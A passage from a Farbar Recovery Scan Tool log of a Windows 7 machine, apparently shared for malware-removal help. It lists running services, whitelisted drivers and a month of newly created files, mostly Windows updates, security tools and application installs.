C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe [75120 2015-03-04] (Dell) S4 DellDataVault; C:\Program Files\Dell\DellDataVault\DellDataVault.exe [2542288 2014-08-13] (Dell Inc.) S4 DellDataVaultWiz; C:\Program Files\Dell\DellDataVault\DellDataVaultWiz.exe [199888 2014-08-13] (Dell Inc.) R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [16232 2014-05-28] (Intel Corporation) R2 iBtSiva; C:\Program Files (x86)\Intel\Bluetooth\ibtsiva.exe [121288 2014-06-06] (Intel Corporation) S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887232 2014-01-31] (Intel® Corporation) S3 InvProtectSvc; C:\Program Files (x86)\Invincea\Enterprise\X64\InvProtectSvc64.exe [2672328 2014-07-30] (Invincea, Inc.) R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [154584 2014-04-29] (Intel Corporation) S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1080120 2015-04-14] (Malwarebytes Corporation) S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [284912 2014-05-29] () R2 NuTCRACKERService; C:\Windows\system32\nutsrv4.exe [574776 2012-10-12] (MKS Software Inc.) R2 NVWMI; C:\Windows\system32\nvwmi64.exe [2694368 2014-08-26] () R2 O2FLASH; C:\Windows\system32\DRIVERS\o2flash.exe [65536 2014-03-07] (BayHubTech/O2Micro International) R2 poaService; C:\Program Files\Dell\PPO\poaService.exe [721104 2014-08-15] (Dell Inc.) R2 PoaSMSrv; C:\Program Files\Dell\PPO\poaSmSrv.exe [312016 2014-08-15] (Dell Inc.) R2 poaTaServ; C:\Program Files\Dell\PPO\poaTaServ.exe [645328 2014-08-16] (Dell Inc.) R2 PortmapperService; C:\PTC\Creo2_M130/PTC Portmapper/i486_nt/obj/portmap.exe [506368 2015-04-03] (PTC Inc.) [File not signed] R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [291032 2014-08-18] (Realtek Semiconductor) S3 SboxSvc; C:\Program Files (x86)\Invincea\Enterprise\Sandbox\SboxSvc.exe [173256 2014-07-30] (Invincea, Inc.) R2 SC_Svc; C:\Program Files (x86)\Spyware Clear\SC_svc64.exe [3006784 2015-01-27] (Crawler Group) R2 SftService; C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe [1921768 2014-07-02] (SoftThinks SAS) R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2015-03-12] (Microsoft Corporation) R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3816176 2014-05-29] (Intel® Corporation) S3 Dell.CommandPowerManager.Service; C:\Windows\SysWOW64\dllhost.exe /Processid:{D514122B-7D2D-4663-98CE-314FF40846AE} ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R3 btmaux; C:\Windows\System32\DRIVERS\btmaux.sys [140600 2014-03-26] (Motorola Solutions, Inc.) R3 btmhsf; C:\Windows\System32\DRIVERS\btmhsf.sys [1423160 2014-04-18] (Motorola Solutions, Inc.) R3 DDDriver; C:\Windows\System32\drivers\DDDriver64Dcsa.sys [23760 2014-08-13] (Dell Computer Corporation) R3 DellProf; C:\Windows\System32\drivers\DellProf.sys [23312 2014-08-13] (Dell Computer Corporation) R3 e1dexpress; C:\Windows\System32\DRIVERS\e1d62x64.sys [489752 2014-06-12] (Intel Corporation) R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [28008 2014-05-02] (Intel Corporation) R3 ibtusb; C:\Windows\System32\DRIVERS\ibtusb.sys [199624 2014-06-06] (Intel Corporation) R3 IntcAzAudAddService; C:\Windows\System32\drivers\RTDVHD64.sys [2638808 2014-10-15] (Realtek Semiconductor Corp.) S3 InvProtectDrv; C:\Program Files (x86)\Invincea\Enterprise\X64\InvProtectDrv64.sys [50696 2014-07-30] (Invincea, Inc.) R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-04-14] (Malwarebytes Corporation) R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [136408 2015-04-23] (Malwarebytes Corporation) S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2015-04-14] (Malwarebytes Corporation) R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [118272 2014-04-29] (Intel Corporation) R3 NETwNs64; C:\Windows\System32\DRIVERS\Netwsw02.sys [3442144 2014-06-18] (Intel Corporation) R1 nvkflt; C:\Windows\System32\DRIVERS\nvkflt.sys [300440 2014-08-26] (NVIDIA Corporation) R3 O2FJ2RDR; C:\Windows\System32\DRIVERS\O2FJ2w7x64.sys [210592 2014-05-14] (BayHubTech/O2Micro ) R3 POADrvr; C:\Windows\System32\drivers\POADrvr.sys [21264 2014-08-15] (Dell Computer Corporation) S3 SboxDrv; C:\Program Files (x86)\Invincea\Enterprise\Sandbox\SboxDrv.sys [183304 2014-07-30] (Invincea, Inc.) R2 sp_rsdrv2; C:\Windows\System32\DRIVERS\stflt.sys [51496 2011-08-24] (Windows ® Win 7 DDK provider) R3 ST_ACCEL; C:\Windows\System32\DRIVERS\ST_Accel.sys [75976 2013-08-06] (STMicroelectronics) R3 usb3Hub; C:\Windows\System32\DRIVERS\usb3Hub.sys [204184 2014-03-04] (Windows ® Win 7 DDK provider) ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2015-04-23 15:32 - 2015-04-23 15:32 - 00022962 _____ () C:\Users\tboe\Downloads\FRST.txt 2015-04-23 15:32 - 2015-04-23 15:32 - 00000000 ____D () C:\FRST 2015-04-23 15:31 - 2015-04-23 15:31 - 02099712 _____ (Farbar) C:\Users\tboe\Downloads\FRST64.exe 2015-04-23 11:52 - 2015-04-23 14:01 - 00136408 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2015-04-23 11:52 - 2015-04-23 11:52 - 00001108 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2015-04-23 11:52 - 2015-04-23 11:52 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2015-04-23 11:52 - 2015-04-23 11:52 - 00000000 ____D () C:\ProgramData\Malwarebytes 2015-04-23 11:52 - 2015-04-23 11:52 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware 2015-04-23 11:52 - 2015-04-14 09:37 - 00107736 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2015-04-23 11:52 - 2015-04-14 09:37 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2015-04-23 11:52 - 2015-04-14 09:37 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2015-04-23 11:51 - 2015-04-23 11:52 - 21546080 _____ (Malwarebytes Corporation ) C:\Users\tboe\Downloads\mbam-setup-2.1.6.1022.exe 2015-04-23 11:47 - 2015-04-23 11:47 - 00000000 ____D () C:\Windows\System32\Tasks\OfficeSoftwareProtectionPlatform 2015-04-23 11:47 - 2015-04-23 11:47 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013 2015-04-23 11:46 - 2015-04-23 11:46 - 00000000 ____D () C:\Program Files\Microsoft Office 15 2015-04-23 11:43 - 2015-04-23 11:43 - 00000000 ____D () C:\Users\tboe\AppData\Local\Citrix 2015-04-23 11:43 - 2015-04-23 11:43 - 00000000 ____D () C:\ProgramData\Citrix 2015-04-23 11:43 - 2015-04-23 11:43 - 00000000 ____D () C:\Program Files (x86)\Citrix 2015-04-23 11:39 - 2015-04-23 11:39 - 00000020 _____ () C:\Users\tboe\AppData\Roaming\appdataFr3.bin 2015-04-23 11:39 - 2015-04-23 11:39 - 00000000 ____D () C:\ProgramData\sale-o 2015-04-21 16:41 - 2015-04-21 16:41 - 00596749 _____ () C:\Users\tboe\Desktop\One3 Design shop.pptx 2015-04-21 16:33 - 2014-11-19 11:43 - 203275973 _____ () C:\Users\tboe\Desktop\One3Design-PrototypeUPDATE092014.mp4 2015-04-19 08:42 - 2015-04-23 14:47 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2015-04-19 08:42 - 2015-04-23 14:00 - 00000890 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2015-04-19 08:42 - 2015-04-19 08:42 - 00003890 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA 2015-04-19 08:42 - 2015-04-19 08:42 - 00003638 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore 2015-04-19 08:42 - 2015-04-19 08:42 - 00002261 _____ () C:\Users\Public\Desktop\Google Chrome.lnk 2015-04-19 08:42 - 2015-04-19 08:42 - 00000000 ____D () C:\Users\tboe\AppData\Local\Google 2015-04-19 08:42 - 2015-04-19 08:42 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome 2015-04-19 08:42 - 2015-04-19 08:42 - 00000000 ____D () C:\Program Files (x86)\Google 2015-04-19 08:41 - 2015-04-19 08:42 - 00000000 ____D () C:\Users\tboe\AppData\Local\Deployment 2015-04-19 08:41 - 2015-04-19 08:41 - 00000000 ____D () C:\Users\tboe\AppData\Local\Apps\2.0 2015-04-18 12:34 - 2015-04-19 08:34 - 00000000 ___SD () C:\Windows\system32\GWX 2015-04-18 12:34 - 2015-04-18 12:34 - 00000000 ___SD () C:\Windows\SysWOW64\GWX 2015-04-18 12:34 - 2015-04-18 12:34 - 00000000 ___SD () C:\Windows\system32\CompatTel 2015-04-18 12:34 - 2015-04-18 12:34 - 00000000 ____D () C:\Windows\system32\appraiser 2015-04-18 12:33 - 2015-01-08 18:44 - 00419936 _____ () C:\Windows\SysWOW64\locale.nls 2015-04-18 12:33 - 2015-01-08 18:43 - 00419936 _____ () C:\Windows\system32\locale.nls 2015-04-18 11:07 - 2012-07-25 22:08 - 00744448 _____ (Microsoft Corporation) C:\Windows\system32\WUDFx.dll 2015-04-18 11:07 - 2012-07-25 22:08 - 00229888 _____ (Microsoft Corporation) C:\Windows\system32\WUDFHost.exe 2015-04-18 11:07 - 2012-07-25 22:08 - 00194048 _____ (Microsoft Corporation) C:\Windows\system32\WUDFPlatform.dll 2015-04-18 11:07 - 2012-07-25 22:08 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\WUDFSvc.dll 2015-04-18 11:07 - 2012-07-25 22:08 - 00045056 _____ (Microsoft Corporation) C:\Windows\system32\WUDFCoinstaller.dll 2015-04-18 11:07 - 2012-07-25 21:26 - 00198656 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WUDFRd.sys 2015-04-18 11:07 - 2012-07-25 21:26 - 00087040 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WUDFPf.sys 2015-04-18 11:07 - 2012-06-02 09:57 - 00000003 _____ () C:\Windows\system32\Drivers\MsftWdf_User_01_11_00_Inbox_Critical.Wdf 2015-04-17 10:02 - 2015-03-24 22:24 - 03298816 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll 2015-04-17 10:02 - 2015-03-24 22:24 - 00696320 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll 2015-04-17 10:02 - 2015-03-24 22:24 - 00098304 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll 2015-04-17 10:02 - 2015-03-24 22:24 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll 2015-04-17 10:02 - 2015-03-24 22:24 - 00037376 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll 2015-04-17 10:02 - 2015-03-24 22:24 - 00035328 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll 2015-04-17 10:02 - 2015-03-24 22:23 - 00135168 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe 2015-04-17 10:02 - 2015-03-24 22:23 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe 2015-04-17 10:02 - 2015-03-24 22:23 - 00012288 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll 2015-04-17 10:02 - 2015-03-24 22:00 - 00566784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll 2015-04-17 10:02 - 2015-03-24 22:00 - 00173056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll 2015-04-17 10:02 - 2015-03-24 22:00 - 00092672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll 2015-04-17 10:02 - 2015-03-24 22:00 - 00033792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe 2015-04-17 10:02 - 2015-03-24 22:00 - 00029696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll 2015-04-17 10:01 - 2015-04-01 19:17 - 00389808 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll 2015-04-17 10:01 - 2015-04-01 18:49 - 00342704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll 2015-04-17 10:01 - 2015-03-24 22:24 - 02553856 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll 2015-04-17 10:01 - 2015-03-24 22:24 - 00191488 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll 2015-04-17 10:01 - 2015-03-22 22:25 - 00769536 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll 2015-04-17 10:01 - 2015-03-22 22:25 - 00726528 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll 2015-04-17 10:01 - 2015-03-22 22:24 - 00957952 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll 2015-04-17 10:01 - 2015-03-22 22:24 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll 2015-04-17 10:01 - 2015-03-22 22:24 - 00227328 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll 2015-04-17 10:01 - 2015-03-22 22:24 - 00192000 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll 2015-04-17 10:01 - 2015-03-22 22:24 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll 2015-04-17 10:01 - 2015-03-22 22:17 - 01111552 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll 2015-04-17 10:01 - 2015-03-17 00:22 - 05557696 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe 2015-04-17 10:01 - 2015-03-17 00:22 - 00155576 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys 2015-04-17 10:01 - 2015-03-17 00:22 - 00095672 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys 2015-04-17 10:01 - 2015-03-17 00:19 - 01727904 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll 2015-04-17 10:01 - 2015-03-17 00:17 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll 2015-04-17 10:01 - 2015-03-17 00:17 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll 2015-04-17 10:01 - 2015-03-17 00:17 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll 2015-04-17 10:01 - 2015-03-17 00:16 - 01461760 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll 2015-04-17 10:01 - 2015-03-17 00:16 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll 2015-04-17 10:01 - 2015-03-17 00:16 - 00728064 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll 2015-04-17 10:01 - 2015-03-17 00:16 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll 2015-04-17 10:01 - 2015-03-17 00:16 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll 2015-04-17 10:01 - 2015-03-17 00:16 - 00341504 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll 2015-04-17 10:01 - 2015-03-17 00:16 - 00314880 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll 2015-04-17 10:01 - 2015-03-17 00:16 - 00309760 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll 2015-04-17 10:01 - 2015-03-17 00:16 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe 2015-04-17 10:01 - 2015-03-17 00:16 - 00215040 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll 2015-04-17 10:01 - 2015-03-17 00:16 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll 2015-04-17 10:01 - 2015-03-17 00:16 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll 2015-04-17 10:01 - 2015-03-17 00:16 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe 2015-04-17 10:01 - 2015-03-17 00:16 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll 2015-04-17 10:01 - 2015-03-17 00:16 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll 2015-04-17 10:01 - 2015-03-17 00:16 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll 2015-04-17 10:01 - 2015-03-17 00:16 - 00029184 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll 2015-04-17 10:01 - 2015-03-17 00:16 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll 2015-04-17 10:01 - 2015-03-17 00:16 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll 2015-04-17 10:01 - 2015-03-17 00:16 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll 2015-04-17 10:01 - 2015-03-17 00:15 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe 2015-04-17 10:01 - 2015-03-17 00:15 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe 2015-04-17 10:01 - 2015-03-17 00:15 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe 2015-04-17 10:01 - 2015-03-17 00:13 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll 2015-04-17 10:01 - 2015-03-17 00:13 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:01 - 03976632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe 2015-04-17 10:01 - 2015-03-17 00:01 - 03920824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe 2015-04-17 10:01 - 2015-03-16 23:59 - 01309696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll 2015-04-17 10:01 - 2015-03-16 23:57 - 00550912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll 2015-04-17 10:01 - 2015-03-16 23:57 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll 2015-04-17 10:01 - 2015-03-16 23:57 - 00248832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll 2015-04-17 10:01 - 2015-03-16 23:57 - 00221184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll 2015-04-17 10:01 - 2015-03-16 23:57 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll 2015-04-17 10:01 - 2015-03-16 23:57 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll 2015-04-17 10:01 - 2015-03-16 23:57 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll 2015-04-17 10:01 - 2015-03-16 23:57 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll 2015-04-17 10:01 - 2015-03-16 23:57 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll 2015-04-17 10:01 - 2015-03-16 23:56 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll 2015-04-17 10:01 - 2015-03-16 23:56 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll 2015-04-17 10:01 - 2015-03-16 23:56 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll 2015-04-17 10:01 - 2015-03-16 23:56 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe 2015-04-17 10:01 - 2015-03-16 23:56 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe 2015-04-17 10:01 - 2015-03-16 23:56 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll 2015-04-17 10:01 - 2015-03-16 23:56 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll 2015-04-17 10:01 - 2015-03-16 23:53 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll 2015-04-17 10:01 - 2015-03-16 23:53 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00686080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll 2015-04-17 10:01 - 